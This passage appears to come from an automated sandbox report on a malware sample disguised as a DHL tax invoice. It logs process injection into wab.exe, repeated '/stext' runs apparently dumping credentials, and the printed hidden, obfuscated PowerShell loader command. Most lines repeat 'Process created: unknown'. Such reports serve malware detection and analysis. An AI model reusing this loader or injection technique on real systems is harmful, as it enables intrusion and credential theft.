              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2FAFAE0Jump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
